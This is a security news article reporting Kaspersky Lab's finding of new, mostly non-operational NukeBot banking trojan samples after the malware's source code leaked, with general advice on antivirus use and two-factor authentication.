New “operational” samples of the NukeBot banking trojan have emerged months after its original creator published its source code.
NukeBot’s source code leak, which occurred in late March 2017, apparently attracted the attention of malware developers seeking to push out their own threats.
Kaspersky Lab’s Sergey Yunakovsky spotted some of those new samples in the wild. A few are “active,” but most of them only in a limited form. As Yunakovsky explains:
“We managed to get our hands on a number of compiled samples of the Trojan. Most of them were of no interest, as they stated local subnet addresses or localhost/127.0.0.1 as the C&C address. Far fewer samples had ‘genuine’ addresses and were ‘operational’. The main functionality of this banking Trojan is to make web injections into specific pages to steal user data, but even from operational servers we only received ‘test’ injections that were included in the source code as examples.”
Most of the versions detected by Yunakovsky and his colleagues come with either plaintext or encrypted strings. From that data, Kaspersky Lab extracted NukeBot’s command and control (C&C) addresses. These assets send the malware a RC4 key for decrypting injections after the trojan has successfully established contact.
The web injections conducted by some of NukeBot’s “combat versions” reveal that the malware is mainly going after French and U.S. users’ banking credentials.
Fortunately, at most five percent of the samples detected by Kaspersky were combat-ready. But that doesn’t mean there could be more in the future. As Yunakovsky rightly notes:
“It is still unclear if these versions were created by a few motivated cybercriminals and the use of NukeBot will taper off soon, or if the source code has fallen into the hands of an organized group (or groups) and the number of combat-grade samples is set to grow.”
To guard their banking credentials against threats like NukeBot, it’s important that users install an anti-virus solution on their computers and exercise caution around suspicious links and email attachments.
You should also enable two-factor authentication (2FA) if it is available on your bank account. Some trojans can bypass this security feature, but doing so considerably raises the stakes of an attack beyond the interest or capabilities of ordinary computer criminals.